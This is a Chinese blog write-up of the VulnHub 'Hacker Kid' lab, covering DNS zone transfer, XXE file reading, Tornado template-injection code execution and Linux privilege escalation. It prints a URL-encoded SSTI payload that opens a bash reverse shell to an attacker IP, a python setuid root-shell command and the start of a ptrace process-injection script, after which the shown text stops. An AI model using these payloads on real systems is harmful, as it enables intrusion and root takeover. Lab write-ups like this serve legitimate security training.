<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- hexo-inject:begin --><!-- hexo-inject:end --><!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="vulnhub7 难度：middle">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub7">
<meta property="og:url" content="https://qingfeng.tech/2023/10/16/vulnhub7/index.html">
<meta property="og:site_name" content="清风的博客">
<meta property="og:description" content="vulnhub7 难度：middle">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090404-n3hfv4k.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012082926-1grf0tr.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083042-hghdt3n.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083242-xeu71l5.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083312-jmcf55x.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083332-e4tv7qu.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083607-vsdjy8s.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083732-k5mpi29.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012083745-gxe0vhw.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012084209-2g6z375.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012084715-0rl6dxy.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012085233-wpoqbi1.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012085407-94hgs1c.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090150-0t5oiip.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090250-2ycgnlm.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090546-vxmkpjr.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090631-ftdsuxj.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090709-ye2g4sz.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231016195637-zmmiuxf.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231016200119-qpthijg.png">
<meta property="og:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231016202934-53kgzbh.png">
<meta property="article:published_time" content="2023-10-16T12:39:48.000Z">
<meta property="article:modified_time" content="2023-12-05T11:42:11.232Z">
<meta property="article:author" content="清风">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://qingfeng.tech/Blogimages/vulnhub7/image-20231012090404-n3hfv4k.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>vulnhub7</title><meta name="robots" content="noindex">
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 6.3.0"><!-- hexo-inject:begin --><!-- hexo-inject:end --><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>

<body class="max-width mx-auto px3 ltr">
    
      <!-- hexo-inject:begin --><!-- hexo-inject:end --><div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/categories/">分类</a></li><!--
     --><!--
       --><li><a href="/%E5%8F%8B%E4%BA%BA%E9%93%BA/">友链</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://qingfeng.tech/2023/10/16/vulnhub7/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://qingfeng.tech/2023/10/16/vulnhub7/&text=vulnhub7"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://qingfeng.tech/2023/10/16/vulnhub7/&is_video=false&description=vulnhub7"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulnhub7&body=Check out this article: https://qingfeng.tech/2023/10/16/vulnhub7/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://qingfeng.tech/2023/10/16/vulnhub7/&title=vulnhub7"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://qingfeng.tech/2023/10/16/vulnhub7/&name=vulnhub7&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://qingfeng.tech/2023/10/16/vulnhub7/&t=vulnhub7"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#vulnhub7"><span class="toc-number">1.</span> <span class="toc-text">vulnhub7</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.1.</span> <span class="toc-text">信息收集</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#getshell"><span class="toc-number">1.2.</span> <span class="toc-text">getshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87"><span class="toc-number">1.3.</span> <span class="toc-text">权限提升</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        vulnhub7
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">清风</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-10-16T12:39:48.000Z" class="dt-published" itemprop="datePublished">2023-10-16</time>
        
        (Updated: <time datetime="2023-12-05T11:42:11.232Z" class="dt-updated" itemprop="dateModified">2023-12-05</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/%E9%9D%B6%E6%9C%BA/">靶机</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="vulnhub7"><a href="#vulnhub7" class="headerlink" title="vulnhub7"></a>vulnhub7</h1><p>靶机地址：<a target="_blank" rel="noopener" href="https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova">https://download.vulnhub.com/hackerkid/Hacker_Kid-v1.0.1.ova</a></p>
<p>这次的靶机风格比较偏向OSCP风格，区别于传统的CTF类型的靶机，只需要提权到root即可，而且这次打靶确实触碰到很多知识盲区了</p>
<p>提示：本地不需要任何暴力破解的地方，而且每个点都会有响应的提示</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>老传统nmap信息收集了：</p>
<p>扫描端口：</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop/Tools/pwndbg<span class="token punctuation">]</span>
└─$ <span class="token function">sudo</span> nmap --min-rate 10000 -p- 192.168.120.129
Starting Nmap 7.94 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2023-10-12 07:50 CST
Nmap scan report <span class="token keyword">for</span> 192.168.120.129
Host is up <span class="token punctuation">(</span>0.00049s latency<span class="token punctuation">)</span>.
Not shown: 65532 closed tcp ports <span class="token punctuation">(</span>reset<span class="token punctuation">)</span>
PORT     STATE SERVICE
53/tcp   <span class="token function">open</span>  domain
80/tcp   <span class="token function">open</span>  http
9999/tcp <span class="token function">open</span>  abyss
MAC Address: 00:0C:29:29:42:E8 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>

Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 0.75 seconds
</code></pre>
<p>扫到这个53的时候眼前一亮，下意识以为是域，但是只有一台靶机，其实这个53端口在打Linux靶的时候是比较少见的，以为基本不需要专门开放一个53端口来配置域名，一般来说用nginx等中间件就可以完成本地的域名工作。</p>
<p>另外这里再说几个DNS的小知识：</p>
<pre class=" language-xml"><code class="language-xml">tcp 53两个域之间的DNS服务器进行交互，日常上网的域名解析都是udp的53。但是axfr之间的通信就是使用的TCP传输和同步
</code></pre>
<p>猜测这里扫到53端口是肯定可以利用的</p>
<p>接下来探测详细信息：</p>
<pre class=" language-bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~/Desktop/Tools/pwndbg<span class="token punctuation">]</span>
└─$ <span class="token function">sudo</span> nmap -A -p 53,80,9999 192.168.120.129
Starting Nmap 7.94 <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at 2023-10-12 07:50 CST
Nmap scan report <span class="token keyword">for</span> 192.168.120.129
Host is up <span class="token punctuation">(</span>0.00012s latency<span class="token punctuation">)</span>.

PORT     STATE SERVICE VERSION
53/tcp   <span class="token function">open</span>  domain  ISC BIND 9.16.1 <span class="token punctuation">(</span>Ubuntu Linux<span class="token punctuation">)</span>
<span class="token operator">|</span> dns-nsid: 
<span class="token operator">|</span>_  bind.version: 9.16.1-Ubuntu
80/tcp   <span class="token function">open</span>  http    Apache httpd 2.4.41 <span class="token variable"><span class="token punctuation">((</span>Ubuntu<span class="token punctuation">))</span></span>
<span class="token operator">|</span>_http-server-header: Apache/2.4.41 <span class="token punctuation">(</span>Ubuntu<span class="token punctuation">)</span>
<span class="token operator">|</span>_http-title: Notorious Kid <span class="token keyword">:</span> A Hacker 
9999/tcp <span class="token function">open</span>  http    Tornado httpd 6.1
<span class="token operator">|</span> http-title: Please Log In
<span class="token operator">|</span>_Requested resource was /login?next<span class="token operator">=</span>%2F
<span class="token operator">|</span>_http-server-header: TornadoServer/6.1
MAC Address: 00:0C:29:29:42:E8 <span class="token punctuation">(</span>VMware<span class="token punctuation">)</span>
Warning: OSScan results may be unreliable because we could not <span class="token function">find</span> at least 1 <span class="token function">open</span> and 1 closed port
Device type: general purpose
Running: Linux 4.X<span class="token operator">|</span>5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.12 ms 192.168.120.129

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token keyword">.</span>
Nmap done: 1 IP address <span class="token punctuation">(</span>1 host up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> 15.68 seconds
</code></pre>
<p>​<code>9999</code>​端口是<code>Tornado</code>​框架开发的Web服务</p>
<p>两个web服务都可以看看</p>
<p>看一眼9999的：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090404-n3hfv4k.png" alt="image">​</p>
<p>需要登录，虽然提示说不用爆破，还是爆破了一下，确实没有结果</p>
<p>先看80的：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012082926-1grf0tr.png" alt="image">​</p>
<p>一个提示和三个功能点：</p>
<p>提示<code>dig me more</code>​ 和DNS对应</p>
<p>三个功能点都把锚点<code># ​</code>​​去掉可以访问，但是没有可利用的点</p>
<h2 id="getshell"><a href="#getshell" class="headerlink" title="getshell"></a>getshell</h2><p>F12看一眼：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012083042-hghdt3n.png" alt="image">​</p>
<p>提示了page_no，那就传参page_no</p>
<p>​​<img src="/Blogimages/vulnhub7/image-20231012083242-xeu71l5.png" alt="image">​</p>
<p>提示更深一点，那就批量跑数据：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012083312-jmcf55x.png" alt="image">​</p>
<p>发现21有东西</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012083332-e4tv7qu.png" alt="image">​</p>
<p>给了个域名，配置一下访问看看：</p>
<p>​​<img src="/Blogimages/vulnhub7/image-20231012083607-vsdjy8s.png" alt="image">​​</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012083732-k5mpi29.png" alt="image">​</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012083745-gxe0vhw.png" alt="image">​</p>
<p>那就dig他的DNS</p>
<p>​<code>dig axfr @192.168.120.129 blackhat.local</code>​ (这里的@就是指定DNS服务器)</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012084209-2g6z375.png" alt="image">​</p>
<p>发现了很多个域名，都把他们添加到自己的hosts中依次访问</p>
<pre class=" language-xml"><code class="language-xml">192.168.120.129 hackers.blackhat.local
192.168.120.129 blackhat.local
192.168.120.129 www.blackhat.local
192.168.120.129 ns2.blackhat.local
192.168.120.129 ns1.blackhat.local
192.168.120.129 mail.blackhat.local
192.168.120.129 lackhat.local
192.168.120.129 ftp.blackhat.local
192.168.120.129 id.blackhat.local
192.168.120.129 hackerkid.blackhat.local
</code></pre>
<p>最终我们在hackerkid这个子域名中有了收获</p>
<p><img src="/Blogimages/vulnhub7/image-20231012084715-0rl6dxy.png" alt="image">​</p>
<p>我们注册抓包：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012085233-wpoqbi1.png" alt="image">​</p>
<p>发现是这个样子，这很明显XXE注入了</p>
<p>‍</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012085407-94hgs1c.png" alt="image">​</p>
<p>所以这里已经任意文件读取了</p>
<p>继续贴上我们任意文件读取的思路：</p>
<pre class=" language-xml"><code class="language-xml">1.可以读取/etc/passwd或者知道用户名的前提下，可以看用户目录的历史命令啥的，看怎么cat的flag，flag名字是啥
2.可以看一下/root/.ssh/id_rsa或者/home/user/.ssh/id_rsa查看私钥 公钥文件`authorized_keys`
3.使用php伪协议写文件：
* 写文件：php://filter/write.base64-decode/resource=文件名&amp;txt=写入内容的base64编码
* 如果写入成功的话可以直接查看，否则不成功
4日志包含getshell.
5.filterchains php gen
</code></pre>
<p>保险起见，这里都用php伪协议去读，以为有的字符读不出来是没有回显的，发现只有<code>.profile</code>​和<code>.bashrc</code>​有东西</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090150-0t5oiip.png" alt="image">​</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090250-2ycgnlm.png" alt="image">​</p>
<p>其中.bashrc给了密码：</p>
<pre class=" language-xml"><code class="language-xml"># ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

# don't put duplicate lines or lines starting with space in the history.
# See bash(1) for more options
HISTCONTROL=ignoreboth

# append to the history file, don't overwrite it
shopt -s histappend

# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)
HISTSIZE=1000
HISTFILESIZE=2000

# check the window size after each command and, if necessary,
# update the values of LINES and COLUMNS.
shopt -s checkwinsize

# If set, the pattern "**" used in a pathname expansion context will
# match all files and zero or more directories and subdirectories.
#shopt -s globstar

# make less more friendly for non-text input files, see lesspipe(1)
[ -x /usr/bin/lesspipe ] &amp;&amp; eval "$(SHELL=/bin/sh lesspipe)"

# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "${debian_chroot:-}" ] &amp;&amp; [ -r /etc/debian_chroot ]; then
    debian_chroot=$(cat /etc/debian_chroot)
fi

# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
    xterm-color|*-256color) color_prompt=yes;;
esac

# uncomment for a colored prompt, if the terminal has the capability; turned
# off by default to not distract the user: the focus in a terminal window
# should be on the output of commands, not on the prompt
#force_color_prompt=yes

if [ -n "$force_color_prompt" ]; then
    if [ -x /usr/bin/tput ] &amp;&amp; tput setaf 1 >&amp;/dev/null; then
    # We have color support; assume it's compliant with Ecma-48
    # (ISO/IEC-6429). (Lack of such support is extremely rare, and such
    # a case would tend to support setf rather than setaf.)
    color_prompt=yes
    else
    color_prompt=
    fi
fi

if [ "$color_prompt" = yes ]; then
    PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
else
    PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
fi
unset color_prompt force_color_prompt

# If this is an xterm set the title to user@host:dir
case "$TERM" in
xterm*|rxvt*)
    PS1="\[\e]0;${debian_chroot:+($debian_chroot)}\u@\h: \w\a\]$PS1"
    ;;
*)
    ;;
esac

# enable color support of ls and also add handy aliases
if [ -x /usr/bin/dircolors ]; then
    test -r ~/.dircolors &amp;&amp; eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
    alias ls='ls --color=auto'
    #alias dir='dir --color=auto'
    #alias vdir='vdir --color=auto'

    alias grep='grep --color=auto'
    alias fgrep='fgrep --color=auto'
    alias egrep='egrep --color=auto'
fi

# colored GCC warnings and errors
#export GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'

# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias l='ls -CF'

# Add an "alert" alias for long running commands.  Use like so:
#   sleep 10; alert
alias alert='notify-send --urgency=low -i "$([ $? = 0 ] &amp;&amp; echo terminal || echo error)" "$(history|tail -n1|sed -e '\''s/^\s*[0-9]\+\s*//;s/[;&amp;|]\s*alert$//'\'')"'

# Alias definitions.
# You may want to put all your additions into a separate file like
# ~/.bash_aliases, instead of adding them here directly.
# See /usr/share/doc/bash-doc/examples in the bash-doc package.

if [ -f ~/.bash_aliases ]; then
    . ~/.bash_aliases
fi

# enable programmable completion features (you don't need to enable
# this, if it's already enabled in /etc/bash.bashrc and /etc/profile
# sources /etc/bash.bashrc).
if ! shopt -oq posix; then
  if [ -f /usr/share/bash-completion/bash_completion ]; then
    . /usr/share/bash-completion/bash_completion
  elif [ -f /etc/bash_completion ]; then
    . /etc/bash_completion
  fi
fi

#Setting Password for running python app
username="admin"
password="Saket!#$%@!!"
</code></pre>
<p>回到9999端口登录</p>
<p>发现登录失败，但是把账号改成Saket的时候成功登录：</p>
<p>​<code>saket  / Saket!#$%@!! ​</code>​</p>
<p>登录成功后：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090546-vxmkpjr.png" alt="image">​</p>
<p>提示输入name，传参name试试：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090631-ftdsuxj.png" alt="image">​</p>
<p>还是那句话传参什么回显什么，不是SSTI就是命令执行</p>
<p>输入测试语句1</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231012090709-ye2g4sz.png" alt="image">​</p>
<p>所以SSTI无疑了</p>
<p><strong>tornado的SSTI,需要URL编码，否则字符会被解析成其他符号产生歧义</strong></p>
<pre class=" language-url"><code class="language-url">%7B%25import%20os%20%25%7D%7B%7Bos.system(%27bash%20-c%20"bash%20-i%20>%26%20%2Fdev%2Ftcp%2F192.168.120.128%2F4444%200>%261"%27)%7D%7D
</code></pre>
<h2 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h2><p>反弹shell后,提权检测后发现以下cve可以成功提权：(非预期就不演示了)</p>
<pre class=" language-bash"><code class="language-bash">cve_2022_0847_dirtypipe
cve_2021_4034_pwnkit_lpe_pkexec  （suid）
</code></pre>
<p>另外还有一种解法：</p>
<p>​<code>Capabilities</code>​这种提权方式第一次听，<code>Capabilities</code>​是Linux内核2.2版本以后引入的，也是一种类似<code>Suid</code>​的提权方式。管理员使用命令<code>setcap cap_setuid=ep/usr/bin/perl</code>​对一些可执行文件设置了<code>capabilities</code>​</p>
<p>具体看文章：<a target="_blank" rel="noopener" href="https://www.secrss.com/articles/28488">https://www.secrss.com/articles/28488</a></p>
<p>‍</p>
<p>利用命令 <code>getcap -r / 2&gt;/dev/null</code>​可以提权（如果报错了就用&#x2F;sbin&#x2F;getcap指定运行程序）</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231016195637-zmmiuxf.png" alt="image"></p>
<p>这里可以看到有个python，尝试使用<code>/usr/bin/python2.7 -c &quot;import os;os.setuid(0);os.system(&#39;/bin/sh&#39;)&quot;</code>​</p>
<p>但是这里还是被禁止了：</p>
<p>​<img src="/Blogimages/vulnhub7/image-20231016200119-qpthijg.png" alt="image">​</p>
<p>认真一看<code>ptrace</code>​操作系统进程动态调试跟踪的意思，这里是没有权限调用setuid的</p>
<p>我们只能看进程id，利用下面这个脚本注入进程并监听5600端口，等待连接</p>
<pre class=" language-python"><code class="language-python"><span class="token comment" spellcheck="true"># inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.</span>
<span class="token comment" spellcheck="true"># GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c </span>

<span class="token keyword">import</span> ctypes
<span class="token keyword">import</span> sys
<span class="token keyword">import</span> struct

<span class="token comment" spellcheck="true"># Macros defined in &lt;sys/ptrace.h></span>
<span class="token comment" spellcheck="true"># https://code.woboq.org/qt5/include/sys/ptrace.h.html</span>

PTRACE_POKETEXT   <span class="token operator">=</span> <span class="token number">4</span>
PTRACE_GETREGS    <span class="token operator">=</span> <span class="token number">12</span>
PTRACE_SETREGS    <span class="token operator">=</span> <span class="token number">13</span>
PTRACE_ATTACH     <span class="token operator">=</span> <span class="token number">16</span>
PTRACE_DETACH     <span class="token operator">=</span> <span class="token number">17</span>

<span class="token comment" spellcheck="true"># Structure defined in &lt;sys/user.h></span>
<span class="token comment" spellcheck="true"># https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct</span>

<span class="token keyword">class</span> <span class="token class-name">user_regs_struct</span><span class="token punctuation">(</span>ctypes<span class="token punctuation">.</span>Structure<span class="token punctuation">)</span><span class="token punctuation">:</span>
    _fields_ <span class="token operator">=</span> <span class="token punctuation">[</span>
        <span class="token punctuation">(</span><span class="token string">"r15"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r14"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r13"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r12"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rbp"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rbx"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r11"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r10"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r9"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"r8"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rax"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rcx"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rdx"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rsi"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rdi"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"orig_rax"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rip"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"cs"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"eflags"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"rsp"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"ss"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"fs_base"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
        <span class="token punctuation">(</span><span class="token string">"gs_base"</span><span class="token punctuation">,</span> ctypes<span class="token punctuation">.</span>c_ulonglong<span class="token punctuation">)</span><span class="token punctuation">,</span>
